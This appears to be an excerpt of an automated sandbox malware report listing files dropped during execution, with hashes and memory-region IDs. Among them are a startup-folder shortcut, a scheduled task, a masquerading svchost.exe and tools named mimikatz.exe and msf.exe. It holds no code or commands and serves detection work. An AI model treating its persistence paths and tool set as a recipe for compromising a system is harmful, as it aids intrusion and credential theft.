C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\cache2\entries\6D89348819C8881868053197CA0754F36784BF5F

MD5 c472fd84dbc8355ea14e259775c8d4a8
SHA1 aa66e116005f48c1b69bd751f6dc59bc02b07715
SHA256 f8243d1c5e0aa5c591aceeff2518aeca91abf343cb8601aa688328d0c4827c5d
SHA512 b12ef30ddf08e174bcac2ecaf80eb8c94a7c07c52653eaa907b0555c2da8cfa77d4357d371d526f156d0ec986b6417bf14bb7186db681adc925012899625f142

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

MD5 abc1cf7f78e1a453ff4d5a1474ddd774
SHA1 59d0c17cd5c5e45db110d7f19efc463619c53600
SHA256 e3e48bd411b9b2b34eedf805fa7c5674d5a1a9310e701bbf2d05e7bab1d9ced4
SHA512 d3f21ffbb1ac6d20ee130610efdbea64822b0fc83fa637be841ac9085cf264fd97cc3a1f07f08dab4610216591131a6054cdd13ef6df53575fe3de065437c226

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\datareporting\glean\db\data.safe.tmp

MD5 2aa5225f548f182482e99c2b15f75852
SHA1 69a339b92d16c79a11310007bdd91e88f73eb9f3
SHA256 fa6c8f2c2074c8ac96ab429b22f7b3cdc492b10577ee4ccf2d117c9ba0be94c9
SHA512 1d955dea257a6d410678177225522679e17b4d0731b47baeaeb628432b2b2335b1d5b60f5ff060020bb01d06540a1b613b94378ad27c98f19752ad511f2c7bda

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionCheckpoints.json.tmp

MD5 910f3331aa73246ceaa9e1c7fd064654
SHA1 6d8c663beff7ede9b6b85cf25582264078910e13
SHA256 8483cb8ad1e406195deaf61c4f8270053514aa365d44865637ce927909daade7
SHA512 94e3f0e82c8c1f0d075a07445814b6b95d0d916fe397b7d059920f818e818fd75f309a60636b3b4345e22b3bf2446b35574a055cef8b5d681c33febb0549add4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\prefs-1.js

MD5 3f5cb68f3fe0bf79cbf73ab9370a126b
SHA1 430b7963f5473dae2dd73ddce7e77b29a4ef8e0c
SHA256 0a486148e1630b237b4276b30abf1657efb66728dce6f2906691ff7b0db5def8
SHA512 9d96b09428cebe0f501ffa37a29344ea079ea4ececfb6975947d6bf2b07adbc48fa575b8e47f6cb6d8e8316499db6adb37227aa19afc176f125cf54e9ae7bd97

memory/3640-1525-0x00000000001B0000-0x00000000001B8000-memory.dmp

memory/3640-1526-0x0000000004CC0000-0x0000000004D5C000-memory.dmp

C:\Users\Admin\Desktop\Files\Fast%20Download.exe

MD5 97d80681daef809909ac1b1e3b9898ba
SHA1 f0ecc4ef701ea6ff61290f6fd4407049cd904e60
SHA256 345d5d2759abd08a84c4c2e2a337a1babd02b5eda3921db1b83eb5d5f5ccc011
SHA512 f90bb8868612f5bc52c07cf90c4e62daf47ba3a3418fae3a82030bff449d62cd83ce185b22fdae632abdb661c8e3a725cc5fa5c44e47ca34f9ccbda6fafd21da

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk

MD5 1480e1832a1c3b23dafaa69ddfedfb8d
SHA1 428c66ffd881997b8b24509b7811e7c9f8e64b0f
SHA256 93f5698bfa6f6301d09cdcf9c3d6fa524297335dc1b8fd267da72c0da91af63f
SHA512 a62460266cadda021a0a483562631502a2fa0534fe318cb6fe87336c09bb0889edcbc1681b79142e42b8803d274462b25398991b9ec570a5e3295319472d0eb4

C:\Users\Admin\Desktop\Files\XClient.exe

MD5 63384bf1d08b472b5c594f4aac46f950
SHA1 eee21f5bf3d6e83c6367056610ff4bfed06653c7
SHA256 cebaf3c3a4d1a842c50daa423f1e81a9d067aec9cda327f745a50d8636ec9352
SHA512 66500ff099939a2359df8558769af77461b6b4185000ab951ec7661fcd1e89f36389ba82dd17675e99ea6243810593ca9a0500bc838d7038ee06774342c0f697

memory/5356-1549-0x00000000009B0000-0x00000000009C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4slk1yg2.45b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5708-1552-0x00000148B4C00000-0x00000148B4C22000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e8eb51096d6f6781456fef7df731d97
SHA1 ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA256 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA512 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a4be454dcbec32af10161f739ec237fc
SHA1 44d5b3b34f92818563efeb37dc75442273cc2bf3
SHA256 4436e1add60e37baccc40f44b93b8ee2baf4261b5e3e45a834ba350ec9658f15
SHA512 a925de5c086cb81b50136d78dc7aea45f8205b57ae8b6219f3d00016b33ebec7e85d7630baf0c09ec2ed29a87c68f0cdefcfd21eb7e99a5679dc632cb725fc4f

C:\Users\Admin\Desktop\Files\built.exe

MD5 a813f565b05ee9df7e5db8dbbcc0fa43
SHA1 f508e738705163233b29ba54f4cb5ec4583d8df1
SHA256 ba59fb813ff718db8a17c4e5d244793d2199383969843ad31d09727b5e5ff156
SHA512 adb431c372c2e1d0f6019bedefe16a2253fcf76929ba7e2b9f9cc7a253137920615121a1a64f7003a43f39e8b17ace233daca32b2933b6953aa6cf558b834e2e

memory/3300-1604-0x0000000000610000-0x0000000000934000-memory.dmp

C:\Users\Admin\Desktop\Files\key.exe

MD5 4cdc368d9d4685c5800293f68703c3d0
SHA1 14ef59b435d63ee5fdabfb1016663a364e3a54da
SHA256 12fb50931a167e6e00e3eb430f6a8406e80a7649f14b1265247b56416ac919b0
SHA512 c8f9d2ba84603384b084f562c731609f9b7006237f2c58b5db9efdfc456932b23e2582f98fb1eb87e28363dc8d9ae4c0a950c9482685bb22604c66a1e6d611de

C:\Users\Admin\Desktop\Files\contorax.exe

MD5 771b8e84ba4f0215298d9dadfe5a10bf
SHA1 0f5e4c440cd2e7b7d97723424ba9c56339036151
SHA256 3f074fb6a883663f2937fd9435fc90f8d31ceabe496627d40b3813dbcc472ed0
SHA512 2814ef23653c9be5f5e7245af291cf330c355ed12b4db76f71b4de699c67a9ffd1bdc0cc1df5352335b57ab920404b9c8e81cd9257527264bde4f72a53700164

memory/1276-1623-0x0000000000530000-0x0000000000550000-memory.dmp

memory/1276-1624-0x0000000002650000-0x0000000002656000-memory.dmp

memory/4488-1637-0x000000001BC00000-0x000000001BC50000-memory.dmp

memory/4488-1638-0x000000001BD10000-0x000000001BDC2000-memory.dmp

C:\Users\Admin\Desktop\Files\Sentil.exe

MD5 cff3e677b6383632eff6d1b52cd6d277
SHA1 0936fb4aa7e39f2b56bc1b4c9364bb95e8f0c2a8
SHA256 0d57b81c8c42d3450782af358d0938d813abc28ec18b3ad6c81bd680a3efbbea
SHA512 ddc33da48cf00e6ee4a57a07a98630082082f5cf76b9c1f844b17ff7f8328f0986a0d95f458947c6ca141a657991b31c608d9b3a9bdc83428ee53e55a34c2e61

memory/5508-1655-0x0000000000C70000-0x0000000000F94000-memory.dmp

C:\Users\Admin\Desktop\Files\pfntjejghjsdkr.exe

MD5 108530f51d914a0a842bd9dc66838636
SHA1 806ca71de679d73560722f5cb036bd07241660e3
SHA256 20ad93fa1ed6b5a682d8a4c8ba681f566597689d6ea943c2605412b233f0a538
SHA512 8e1cdc49b57715b34642a55ee7a3b0cfa603e9a905d5a2a0108a7b2e3d682faec51c69b844a03088f2f4a50a7bf27feb3aabd9733853d9fb4b2ee4419261d05b

C:\Users\Admin\Desktop\Files\Security.exe

MD5 f8862a71544afeafbd2ed09e19e33b50
SHA1 beff8d7435af5b6dcc54bb47fb1b5a61a5faa4bf
SHA256 d3ddea55a7fdb26efcf9d220940191fa07ed291d1b7dce2c7f6f157575886ebb
SHA512 3f16e8b0076698bb2dcbf651fb1227192ac4ebd6a960097f26620f073c5c4e7180703c631e5a11929dc5d00cbd02a89273ba79369d117fb3533ee7f8fe632033

memory/680-1681-0x0000000000F20000-0x0000000000FA0000-memory.dmp

C:\Users\Admin\Desktop\Files\Client-built.exe

MD5 fa5f99ff110280efe85f4663cfb3d6b8
SHA1 ad2d6d8006aee090a4ad5f08ec3425c6353c07d1
SHA256 5b41a8ac5a68ab33e4891ea03533e8ea650c16dd669d277decae2f00217a1e4d
SHA512 a3b898f758060f124c443422c6dc88ba80d9892890b25d21e37a1d3947cd4b9dbef403382ee6e28c1007785a63c5fa387f7d00403db433eb59c03d0b2a88b50e

memory/1664-1696-0x0000000000DE0000-0x0000000001104000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$77Security.exe

MD5 12c1eb283c7106b3f2c8b2ba93037a58
SHA1 540fc3c3a0a2cf712e2957a96b8aff4c071b0e7e
SHA256 35eb77c5983a70f24ba87d96685d1e2911b523d5972dfcbccf3e549316ff16f1
SHA512 72d25cb84ba32b3680edbbf9be92ab279cb7caef6e166917ec68a7eb7c8530b926565faab8a98b05125ad16359149a86dee19b083531a21ac3b41f0c77c5349d

memory/5744-1715-0x00000000003F0000-0x0000000000404000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Install.exe

MD5 1a7d1b5d24ba30c4d3d5502295ab5e89
SHA1 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
SHA256 b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
SHA512 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa

memory/3352-1742-0x000001CDB5BE0000-0x000001CDB5C0A000-memory.dmp

memory/3352-1743-0x00007FFCF5C00000-0x00007FFCF5E09000-memory.dmp

memory/5192-1747-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3352-1744-0x00007FFCF4850000-0x00007FFCF490D000-memory.dmp

memory/5192-1750-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5192-1748-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5192-1746-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5192-1745-0x0000000140000000-0x0000000140008000-memory.dmp

memory/5192-1753-0x00007FFCF5C00000-0x00007FFCF5E09000-memory.dmp

memory/5192-1754-0x00007FFCF4850000-0x00007FFCF490D000-memory.dmp

memory/636-1767-0x00007FFCB5C90000-0x00007FFCB5CA0000-memory.dmp

memory/684-1778-0x00007FFCB5C90000-0x00007FFCB5CA0000-memory.dmp

memory/988-1789-0x00007FFCB5C90000-0x00007FFCB5CA0000-memory.dmp

memory/432-1793-0x0000026764250000-0x000002676427B000-memory.dmp

memory/988-1788-0x00000299D57B0000-0x00000299D57DB000-memory.dmp

memory/988-1782-0x00000299D57B0000-0x00000299D57DB000-memory.dmp

memory/684-1777-0x000001872BD10000-0x000001872BD3B000-memory.dmp

memory/684-1771-0x000001872BD10000-0x000001872BD3B000-memory.dmp

memory/636-1766-0x000001A913380000-0x000001A9133AB000-memory.dmp

memory/636-1760-0x000001A913380000-0x000001A9133AB000-memory.dmp

memory/636-1759-0x000001A913380000-0x000001A9133AB000-memory.dmp

memory/636-1758-0x000001A913350000-0x000001A913375000-memory.dmp

memory/5192-1755-0x0000000140000000-0x0000000140008000-memory.dmp

memory/2304-2734-0x0000000000590000-0x00000000008B4000-memory.dmp

C:\Users\Admin\Desktop\Files\srtware.exe

MD5 e364a1bd0e0be70100779ff5389a78da
SHA1 dd8269db6032720dbac028931e28a6588fca7bae
SHA256 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e
SHA512 ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338

memory/5860-2900-0x0000000000C30000-0x0000000000C42000-memory.dmp

memory/4856-2946-0x0000000000220000-0x0000000000544000-memory.dmp

memory/2128-3090-0x0000000000A80000-0x0000000000DA4000-memory.dmp

memory/4052-3200-0x0000000000A40000-0x0000000000D64000-memory.dmp

memory/1580-3331-0x00000000002F0000-0x0000000000614000-memory.dmp

memory/5616-3441-0x0000015909920000-0x0000015909DF4000-memory.dmp

memory/5596-3707-0x0000000000280000-0x0000000000292000-memory.dmp

C:\Users\Admin\Desktop\Files\winlog32.exe

MD5 741b73ac32f93409f2eff52fc470acd7
SHA1 145518dd63cd26471db279c04671ecc581ff19ba
SHA256 533ffecb86555b7eb74923b557f289b5a7f1c820baa3e0ec76a1bcf27aa06bad
SHA512 0027f14ca6dedd8f9f4ceb87fc38888be18782fba3262144555a2b72355b9baf37f03b80274dace7a6d2fbec3012e54db17be26d20ca124a4b4b8b7a9fc49ec8

memory/1868-3752-0x00000000007A0000-0x00000000007AE000-memory.dmp

memory/1868-3762-0x0000000006340000-0x00000000068E6000-memory.dmp

C:\Users\Admin\Desktop\Files\TPB-1.exe

MD5 d7cc70050313b6ac928a516957342346
SHA1 87ebb959c7f27892466abd20cca68b705019e6bd
SHA256 8bc4c1e92cfffe6d52dd7f5c65263e24dbc7bc470dbf631e782afd5e90ef5ee3
SHA512 f930483f2a0bcd394addd8103affe8bc52f491d24e034d68c55a09012026b150eaa5be4cfdf2313ad31b3b7d00d11fabdbd53b146dc0b6a0b50f16e877003846

memory/5332-3785-0x00000000002D0000-0x0000000000336000-memory.dmp

memory/5292-3899-0x0000000000E60000-0x0000000001184000-memory.dmp

memory/1660-4071-0x0000000000770000-0x0000000000A94000-memory.dmp

memory/4964-4217-0x000000001DA50000-0x000000001DF78000-memory.dmp

memory/3472-4237-0x0000000000CB0000-0x0000000000FD4000-memory.dmp

memory/5216-4383-0x0000000000DC0000-0x00000000010E4000-memory.dmp

memory/3868-4522-0x00007FF77D1F0000-0x00007FF77DDF5000-memory.dmp

memory/232-4582-0x0000000000330000-0x0000000000654000-memory.dmp

memory/5876-4637-0x0000000006030000-0x0000000006354000-memory.dmp

memory/5876-4638-0x0000000005DA0000-0x0000000005E32000-memory.dmp

memory/5876-4639-0x0000000005D30000-0x0000000005D3A000-memory.dmp

memory/5876-4640-0x00000000074D0000-0x0000000007AE8000-memory.dmp

C:\Users\Admin\Desktop\Files\svc.exe

MD5 0b0c3613bead9d95c8f62955129bc6ca
SHA1 d0639a290e178e152e50b50c185d08f79ab52629
SHA256 da8cbf6c2b20389be881bb0c84a74d8a84c525df491f44f883b424075f9391be
SHA512 fbd1b2213a85402c98b4588cf7757a9745c50a974dea21a87e73e572bb0c6d2b473db39a2b4043e48b90da364f7fc30462df1340921401ed16ce4b958c747f26

memory/5876-4647-0x00000000067B0000-0x0000000006800000-memory.dmp

memory/5876-4675-0x0000000006FD0000-0x0000000007082000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\History

MD5 4e2922249bf476fb3067795f2fa5e794
SHA1 d2db6b2759d9e650ae031eb62247d457ccaa57d2
SHA256 c2c17166e7468877d1e80822f8a5f35a7700ac0b68f3b369a1f4154ae4f811e1
SHA512 8e5e12daf11f9f6e73fb30f563c8f2a64bbc7bb9deffe4969e23081ec1c4073cdf6c74e8dbcc65a271142083ad8312ec7d59505c90e718a5228d369f4240e1da

memory/200-4717-0x0000000000630000-0x0000000000954000-memory.dmp

memory/232-4827-0x0000000000D00000-0x0000000001024000-memory.dmp

memory/2680-5580-0x0000000000400000-0x00000000008BF000-memory.dmp

C:\Users\Admin\Desktop\Files\sam.exe

MD5 b839c74b5c9862a8902eaa56dddab109
SHA1 ff68138c57d5714133a47624d7e072a3df697b90
SHA256 b9ef9df1d52d9cc69f95c7b8ea9ba339d3e81bba7f8e3a9b542c7b1287630bf6
SHA512 c150b7977666f1ff539c2e1437e2d60b01057ed2971f6c818e9397f517caa656870bc63ac6524e8b7b383c97c1889a24d4997bc9f2f6fde1ae1b062862d68cf9

C:\Users\Admin\Desktop\Files\CrazyCoach.exe

MD5 42f4afaac5036765b62b06cfd1269d14
SHA1 9576960c3357a9fb330ccbe87c7237f47e7ac897
SHA256 57330e824af5acfab6b83494ad5ce3e7d66e66e91d233434babcdd3dde879e1d
SHA512 caaaaacc6a61269df2dda4daf59a0fe2a110e012f1e735da58ef66030cc763173696b86672400ca7f76ef12ca6212ba1bb393b1596527625da685a42712c52e7

memory/2680-5674-0x0000000000400000-0x00000000008BF000-memory.dmp

memory/6000-5678-0x0000000000FB0000-0x0000000001070000-memory.dmp

memory/1680-5719-0x0000000000BE0000-0x0000000000F04000-memory.dmp

memory/3840-5772-0x0000000000850000-0x0000000000868000-memory.dmp

memory/5620-5810-0x000001D9E7270000-0x000001D9E72A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Impacts.bat

MD5 e66bce26cc9f5ea1c9e1d78fdb060e57
SHA1 5a83a6454cb6384fdaaf68585d743da3488eed28
SHA256 34e6b48e8a53c7f983f7944c69764cbac28fbd0d2283e797506d0e256debf3d2
SHA512 94ef52636660fb3d7aadc10459460781d95e1d83389e3519f19d093806f273b330b4596f03ac1f9268aad45a244e537ff6d0ba773be33c627fe86f18128bff7e

C:\Users\Admin\Desktop\Files\S%D0%B5tu%D1%80111.exe

MD5 9436c63eb99d4933ec7ffd0661639cbe
SHA1 12da487e8e0a42a1a40ed00ee8708e8c6eed1800
SHA256 3a79351bd8099a518ecb4258aacecc84f7ed44cf67426b482b7583ce20c17e4e
SHA512 59bc369bf7d96865be7e2f0b148e8216804c7f85d59958e7cc142770b44a84a266db8aec05b28bed483828f84abd81a21b3d40cdda230c1a534f6b380a387c44

C:\Users\Admin\Desktop\Files\XM.exe

MD5 0940599cefe789664d6a032a27b25b73
SHA1 c6ee1fe58fdd7ba3c3f3d0e708228e53050cf4fa
SHA256 ed42c5f70c10694c1376f330cfbdcee52b72aed3b7eb25debcc1b2ba613c0922
SHA512 47c01da51b42cb086202d05f01613d81b75e37a8b718f13597a18d8693e3a6f8666d28d9c79abcd143d1d3c93d7a4051e551f4354306a7b57507967bc9adf781

memory/5492-6596-0x0000000000650000-0x0000000000704000-memory.dmp

memory/5492-6597-0x0000000001070000-0x0000000001152000-memory.dmp

C:\Users\Admin\Desktop\Files\xxx.exe

MD5 708adef6da5ac2ffee5f01f277560749
SHA1 3dedb41674634e6b53dfaea704754cee7bddfbe3
SHA256 0fec722a795adc9e313422c62e8ff0c7dac935dfef78da6560e38455a7739e4a
SHA512 463927da961a3a52199d2a70dbf51aed7b600e45da5e71c73c9ea9b9971c32fc77b3f1d442400a4a4fe4d0a5bc024893f633a5d898dd9e955b9ed3a8d0d3ce28

C:\Users\Admin\Desktop\Files\surfex.exe

MD5 1f4b0637137572a1fb34aaa033149506
SHA1 c209c9a60a752bc7980a3d9d53daf4b4b32973a9
SHA256 60c645c0a668c13ad36d2d5b67777dedf992e392e652e7f0519f21d658254648
SHA512 4fd27293437b8bf77d15d993da2b0e75c9fba93bd5f94dad439a3e2e4c16c444f6a32543271f1d2ad79c220354b23301e544765ca392fc156267a89338452e86

memory/6936-9541-0x0000000000B00000-0x0000000000B54000-memory.dmp

memory/6204-9556-0x0000000000400000-0x0000000000450000-memory.dmp

memory/5492-9559-0x0000000000EE0000-0x0000000000F2C000-memory.dmp

memory/5492-9558-0x0000000001150000-0x00000000011C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpF7C8.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/6204-9584-0x0000000005D20000-0x0000000005D96000-memory.dmp

memory/6204-9587-0x0000000006730000-0x000000000676C000-memory.dmp

memory/6204-9586-0x0000000005DC0000-0x0000000005DD2000-memory.dmp

memory/6204-9588-0x0000000006770000-0x00000000067BC000-memory.dmp

memory/6204-9585-0x0000000006800000-0x000000000690A000-memory.dmp

memory/6524-9643-0x00000000008A0000-0x00000000008B2000-memory.dmp

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{E6ADFD51-FF5F-4049-8192-CB91A1ADE0C3}\EDGEMITMP_16329.tmp\SETUP.EX_

MD5 1a59a8af3c58b30ff0fe71db2196b24b
SHA1 6b0e5ba36f4fc5328ec494272054a50cafa13e68
SHA256 ba25974b29a25cb7bc1f58a0990a8ce758354aa6ec5b8b8af210f2c1466ba49d
SHA512 f173fe15db8d7aeef4f6fa62a41246550ccee207e6388095a5f87036362d4c95da646e1a7c68764054556e024da80b749646425076e9bfac42fb77be8f2c0355

memory/8180-9860-0x0000000000F40000-0x0000000001264000-memory.dmp

memory/6440-9944-0x0000000000370000-0x0000000000694000-memory.dmp

memory/6956-10064-0x0000000000B50000-0x0000000000E74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\temp_16933.exe

MD5 e18ff32f235079a5b06d8ef0b5e135d4
SHA1 30782031c29c370b4637882202776bc092b2b098
SHA256 99703b09d6585f8ef49bdefba101a9f388056a393f7b3b5bfc42d44835f80ca4
SHA512 b884b5551063e8a4516b25d957728295c97f3bb16d01834b84a54d2dd512beb24c8df91e87040b2c8738d36786b7d94c3fa2257c7ba644890794e67f1df262d3

C:\Users\Admin\AppData\Local\Temp\temp_16943.exe

MD5 eba33219c7bdec31cab46dc3c5735e76
SHA1 bf9339f46d7a33d342aeb7fca8b5d5fb8b4d165a
SHA256 4d9440023af17170008531098b4a9e25f4fcfd29782c872a5e616fcb33dfa6f6
SHA512 a74c43e45ff7e771065879b640097a169b49225ebcfa747351db445a4f253105b7535e438a7e4e82e13b9a9fcc62f6cfe49a8760499f9e9efc2002a965a43774

memory/6260-10169-0x00007FF6D9520000-0x00007FF6D95B5000-memory.dmp

memory/6260-10176-0x00007FF6D9520000-0x00007FF6D95B5000-memory.dmp

memory/8112-10188-0x0000000000FA0000-0x0000000000FB2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

MD5 74b69084450d644a129195282bfb0f9a
SHA1 ffb7f2d1a9b989a5f0efeb9dbdb7d09e57dcdfdd
SHA256 19018d9b0bf2ca78774d3ffdfed4513f6cc6e17a8f4ba80a2cb7f37270ac97ba
SHA512 9005de844e55e3cfabd30f03bbebfb46e3a554c3ef0f19f41fc660ffeff66f5bf62161ed8f85aa5c4559efde0e865e8dd17df8a63219abfa8fe1d511910d3242

memory/8088-10364-0x0000000000DD0000-0x00000000010F4000-memory.dmp

C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

MD5 e46aaf1691c780f9bbdb68feb90024b8
SHA1 05c3be0a3f8b047cadaec75b5bd59a3fa5ba9586
SHA256 b0f233e452a86af1c91466ed94ec94e37f02e6a939f16a9ed969c73dc3baa83e
SHA512 0cdc338b7b97e38acec66e37df578e31c28ad3cb484111ab0e2297cee64fe98b67d42538e8caddf279f9582efe816a4ec3c76bac638a219756fde7b60a94fdb9

memory/4592-10686-0x0000000000E00000-0x0000000001124000-memory.dmp

memory/6960-10799-0x00000000009B0000-0x0000000000CD4000-memory.dmp

memory/7296-10866-0x0000000000AB0000-0x0000000001082000-memory.dmp

memory/7296-10876-0x0000000005D40000-0x0000000005EC6000-memory.dmp

memory/7296-10877-0x0000000005920000-0x0000000005942000-memory.dmp

C:\Users\Admin\Desktop\Files\svchost.exe

MD5 da4b81bd7225f06fa1ff1a6c0f50c69f
SHA1 e630b7442a8f9cf9945216dcab8e750ebd01e307
SHA256 01c295a6690c48ff3196ff3ef0fef7383bdba9beaa6dadf8426e689263be5e20
SHA512 57017466deb54d0a7a582a5352cbc90600b08cc4b0bd7c0ebf017d30f008507ef9d5257920bc76ffb0e271b9dc358eed7dadefbb2d305d4f6da53bf51a65d3f0

memory/4104-10991-0x0000000000E90000-0x0000000000EA6000-memory.dmp

memory/7192-11030-0x0000000000D80000-0x00000000010A4000-memory.dmp

memory/4664-11237-0x0000000000A40000-0x0000000000D64000-memory.dmp

memory/2140-11531-0x0000000000A20000-0x0000000000D44000-memory.dmp

memory/6692-11657-0x0000000000CF0000-0x0000000001014000-memory.dmp

memory/6836-11778-0x0000000000930000-0x0000000000C54000-memory.dmp

memory/6028-12008-0x0000000000D20000-0x0000000001044000-memory.dmp

C:\ProgramData\adbabbcfdbc.cfg

MD5 7712f3490a250619730314c9e76971ef
SHA1 1e15ddfcf03033cfc45d7e7d603cfd4d3720a086
SHA256 972bcf2d3f9c22628cc3fb6b478085c3616a2053eea636462a2ea84407164f24
SHA512 7c498573dd89ba140ea4a824f5df16e6d57b6755d3fcad5413579d2739b375669c5778874e81b93aba695ff3fc6a387b975fbac964b51c4ebf9b2abb8279aa5f

memory/7892-12121-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/2740-12187-0x0000000000680000-0x00000000009A4000-memory.dmp

memory/7892-12188-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/6652-12291-0x00000000008E0000-0x0000000000C04000-memory.dmp

memory/7084-12305-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/7084-12372-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/6352-12456-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/6352-12572-0x0000000000A20000-0x000000000119B000-memory.dmp

memory/6880-12595-0x0000000000A70000-0x0000000000A82000-memory.dmp

memory/5952-12835-0x0000000000610000-0x0000000000934000-memory.dmp

C:\ProgramData\wvtynvwe\AutoIt3.exe

MD5 0adb9b817f1df7807576c2d7068dd931
SHA1 4a1b94a9a5113106f40cd8ea724703734d15f118
SHA256 98e4f904f7de1644e519d09371b8afcbbf40ff3bd56d76ce4df48479a4ab884b
SHA512 883aa88f2dba4214bb534fbdaf69712127357a3d0f5666667525db3c1fa351598f067068dfc9e7c7a45fed4248d7dca729ba4f75764341e47048429f9ca8846a

C:\Users\Admin\Desktop\Files\856.exe

MD5 68edafe0a1705d5c7dd1cb14fa1ca8ce
SHA1 7e9d854c90acd7452645506874c4e6f10bfdda31
SHA256 68f0121f2062aede8ae8bd52bba3c4c6c8aa19bdf32958b4e305cf716a92cc3d
SHA512 89a965f783ea7f54b55a542168ff759e851eae77cdfa9e23ba76145614b798f0815f2feb8670c16f26943e83bba2ade0649d6dc83af8d87c51c42f96d015573d

memory/3724-13081-0x0000000000450000-0x0000000000686000-memory.dmp

C:\Users\Admin\Desktop\Files\ciscotest.exe

MD5 0076324b407d0783137badc7600327a1
SHA1 29e6cb1f18a43b8e293539d50272898a8befa341
SHA256 55c727a9806966ec83f22702c1101c855a004c5658cf60e3c3499f895b994583
SHA512 96b08dd1a7abccefabe3568637c17f6ae2c04349488db8dc05b9dcaaaef6a041c36fa4a1f1841096d6622b9775099c7c7eb1497c57581cb444afeb481563cae4

memory/3724-13090-0x0000000005150000-0x000000000522C000-memory.dmp

memory/3724-14227-0x0000000005310000-0x0000000005368000-memory.dmp

memory/3724-14565-0x00000000050C0000-0x0000000005114000-memory.dmp

C:\Windows\System32\Tasks\Test Task17

MD5 b929f752eefcbc69fa7b6c4cb52b3a00
SHA1 dfaa828faa819a31c73e309dd1819f3446fab996
SHA256 4023bb6ef24afd8412072ff49790efffba497a7f6bf1b8fd2f81e53c42064e8a
SHA512 d3b0983f53142828a0c4c68e6bdbf5c7a5f13810b5cfee2c466b2e2da5c6953d009803712cd346b292f7d0419c9a70872e904fc1b9d4eb933ff950314825bd2f

C:\Users\Admin\Desktop\Files\msf.exe

MD5 8597aa1db8457c9b8e2e636c55a56978
SHA1 d6ee74a13ee56eb7556e88b5b646e1c3581bf163
SHA256 e1579bd0d471cdfbcadbb1b27454da080a6a5e13021033208b7592ccea607320
SHA512 943299ec65c1ebf0e74725648419ca76bdba72cbc39accb63305f57bba45c88227e9df80aebea9dfe47014c534e7067e7e844584356c6a39097d816c27c6a22f

memory/6812-15987-0x0000000000340000-0x0000000000664000-memory.dmp

memory/7356-16074-0x0000000000230000-0x0000000000554000-memory.dmp

memory/2724-16198-0x0000000000C60000-0x0000000000F84000-memory.dmp

memory/4784-16202-0x0000000000560000-0x0000000000884000-memory.dmp

C:\Users\Admin\Desktop\Files\mimikatz.exe

MD5 6dca8f740c1d76413c77796c7344d861
SHA1 e747301f18bdedd2b06794a0d372ce11db8370ae
SHA256 2280e717c054c708e8930acfda84805c5ac05eced6c06a0146f836ce2f5a00ec
